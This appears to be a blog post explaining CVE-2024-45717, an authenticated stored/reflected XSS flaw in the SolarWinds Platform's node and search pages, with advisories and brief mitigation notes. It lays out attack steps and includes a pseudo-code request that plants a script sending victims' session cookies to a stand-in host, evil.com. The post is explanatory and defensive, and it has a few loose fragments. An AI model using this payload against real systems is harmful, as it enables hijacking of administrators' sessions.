In June 2024, a new security flaw was found in the SolarWinds Platform—CVE-2024-45717. This vulnerability is a type of Cross-Site Scripting (XSS) bug that affects the search and node information section of the SolarWinds user interface. What sets this one apart is that an attacker must be logged in and get a user to interact with something malicious—so it’s not a simple, fire-and-forget hack.
In this post, we’ll break down how this vulnerability worked, look at example exploit steps, and share links to the original advisories and proofs of concept. We’ll also talk about how to stay safe if you’re using SolarWinds Platform.
What is CVE-2024-45717, Exactly?
SolarWinds Platform is a set of IT management tools used worldwide. The CVE-2024-45717 vulnerability affects search and node information pages in the platform. These pages were not handling user-supplied input safely, so specially crafted input (like a malicious search term) could inject JavaScript into the page.
Said simply:
If a logged-in attacker manages to trick another user (also logged in) into searching for or viewing specially crafted data, malicious code can run in their browser.
The Key Details
- Type: Stored/Reflected XSS (Cross-site scripting)
User Interaction Needed: YES (target user must trigger the crafted input)
- CVE Reference: CVE-2024-45717 (MITRE)
- Vendor Advisory: SolarWinds Security Advisory
Let’s look at a possible exploitation scenario
1. Get Authenticated Access: The attacker needs to log in to the SolarWinds platform with valid credentials (could be a low-privileged account).
2. Inject Malicious Input: The attacker inserts malicious JavaScript code in a search field or node info parameter (like the node Title or Description).
3. Trick a Victim: The attacker convinces another user (an admin or someone with more privileges) to view the manipulated search results or node info page.
4. Trigger and Run: When the victim visits the page, the code runs in their browser under their permissions.
Suppose a node’s "Description" field is vulnerable. The attacker might set the description to
<script>alert('XSS PoC by CVE-2024-45717');</script>
When an admin visits the node info page to see details, the browser will pop up an alert
Screenshot illustration (not actual code output):
!Example of alert popup
Of course, in real attacks, instead of an alert, attackers might steal session cookies, modify settings, or pivot further.
Here’s a quick step-by-step in pseudo-code
# Attacker (logged in) submits form with evil payload
payload = "<script>fetch('https://evil.com/?cookie='+document.cookie)</script>"
# Post request (example, Python-style):
requests.post(
url="https://solarwinds.example.com/node/create";,
data={"description": payload},
auth=("attacker", "password")
)
# Victim administrator views node info page, browser loads the attacker's JavaScript
> Note: Never test this on live systems without permission!
System compromise: Chain with other vulnerabilities if reachable.
Since the attack requires a user to log in, the overall risk is limited, but for organizations where many users have access, the risk is more serious.
How to Fix or Mitigate
SolarWinds released a patch in June 2024.
References & Further Reading
- CVE-2024-45717 at NIST NVD
- SolarWinds Security Advisory for CVE-2024-45717
- OWASP XSS Prevention Cheat Sheet
- Common Pittfalls in XSS Prevention
Wrap-up
CVE-2024-45717 is another reminder that security doesn’t stop at the firewall. Even authenticated sections of web apps can harbor dangerous bugs that need user awareness and swift patching to prevent attacks. If you use SolarWinds tools, make sure you’re up to date and keep an eye out for suspicious activity in your environment.
Have tips or questions about this CVE? Let us know in the comments! (And don’t hack anything you don’t own!)
Timeline
Published on: 12/04/2024 07:15:06 UTC